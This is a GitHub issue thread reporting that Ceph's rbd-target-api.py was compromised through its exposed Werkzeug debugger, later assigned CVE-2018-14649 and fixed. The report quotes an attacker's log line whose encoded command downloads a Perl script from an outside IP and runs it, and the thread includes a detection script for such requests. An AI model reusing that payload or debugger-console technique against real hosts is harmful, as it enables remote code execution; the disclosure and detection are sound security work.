
rbd-target-api.py exploited. #120

Closed
realasmo opened this issue Sep 23, 2018 · 7 comments

Comments

@realasmo

Hello,

I've found that the Python code was used to compromise our host remotely (in our case it was running as root, so the attacker gained root privileges); the logs contain:

2018-09-23 05:23:53,267 INFO [_internal.py:87:_log()] - 185.234.217.11 - - [23/Sep/2018 05:23:53] "GET /console?s=7qfxpQm7KShU7OzAilrU&cmd=import+os%3B+os.system%28%27wget+-qO+-+http%3A%2F%2F195.22.126.16%2Fbt.txt%7Cperl%3Bcd+%2Ftmp%3Bcurl+-O+http%3A%2F%2F195.22.126.16%2Fbt.txt%3Bperl+bt.txt%3Brm+-rf+bt.txt%2A%27%29&__debugger__=yes&frm=0 HTTP/1.1" 200 -

Hope this helps.

@dillaman

@realasmo Thanks for the report of the exposed Werkzeug exploit. I'll open a PR to fix it ASAP.

@realasmo

The end of the logfile contains __debugger__=yes, so this may (or may not) be related:

https://www.exploit-db.com/exploits/43905/

@dillaman

Flask is enabling the Werkzeug debugger here [1]

[1] https://github.com/ceph/ceph-iscsi-cli/blob/master/rbd-target-api.py#L2007
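Detection logic for the log pattern quoted in the report above, as an added example (not code from the ceph-iscsi-cli project): it parses Werkzeug access-log lines in the format shown, flags requests aimed at the interactive debugger console (`/console`, `__debugger__=yes`, or a `cmd` parameter), and distinguishes a live console (HTTP 200) from a mere probe. The sample lines and addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Werkzeug access-log line as written by Flask's built-in dev server
# (same layout as the line quoted in the report above).
LOG_RE = re.compile(
    r'^(?P<ts>\S+ \S+) \S+ \[[^\]]*\] - (?P<ip>\S+) - - \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def parse_werkzeug_line(line):
    """Return the interesting fields of one access-log line, or None if it is not one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)  # values are URL-decoded here
    return rec

def is_debugger_access(rec):
    """True if the request targets the Werkzeug debugger console or carries its parameters."""
    q = rec["query"]
    return (rec["path"] == "/console"
            or q.get("__debugger__", [""])[0] == "yes"
            or "cmd" in q)

def find_debugger_hits(lines):
    """Scan log lines; a 200 on the console means the debugger was actually reachable."""
    hits = []
    for line in lines:
        rec = parse_werkzeug_line(line)
        if rec is None or not is_debugger_access(rec):
            continue
        hits.append({
            "ts": rec["ts"], "ip": rec["ip"], "path": rec["path"],
            "status": rec["status"],
            "cmd": rec["query"].get("cmd", [None])[0],   # decoded command, for analyst review
            "severity": "confirmed" if rec["status"] == "200" else "probe",
        })
    return hits

# Constructed sample log (RFC 5737 test addresses, harmless placeholder command).
SAMPLE_LOG = [
    '2018-09-23 05:20:01,100 INFO [_internal.py:87:_log()] - 203.0.113.5 - - [23/Sep/2018 05:20:01] "GET /api/disks HTTP/1.1" 200 -',
    '2018-09-23 05:23:53,267 INFO [_internal.py:87:_log()] - 198.51.100.7 - - [23/Sep/2018 05:23:53] "GET /console?s=abc123&cmd=1%2B1&__debugger__=yes&frm=0 HTTP/1.1" 200 -',
    '2018-09-23 05:24:10,400 INFO [_internal.py:87:_log()] - 198.51.100.7 - - [23/Sep/2018 05:24:10] "GET /console HTTP/1.1" 404 -',
]

if __name__ == "__main__":
    for hit in find_debugger_hits(SAMPLE_LOG):
        print(hit)
```

A 404 on /console indicates the debugger was not enabled when the request arrived; a 200 with a cmd parameter is the case the report describes.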

@sidhax

sidhax commented Sep 24, 2018

CVE-2018-14649 has been assigned for this flaw

@dillaman

See PR #121

@dillaman

Resolved -- also ceph/ceph#24248 includes a documentation update to note that this API should not be publicly accessible.

@abergmann

CVE-2018-14649 was assigned to this issue.

See also rh#1632078 for additional information.
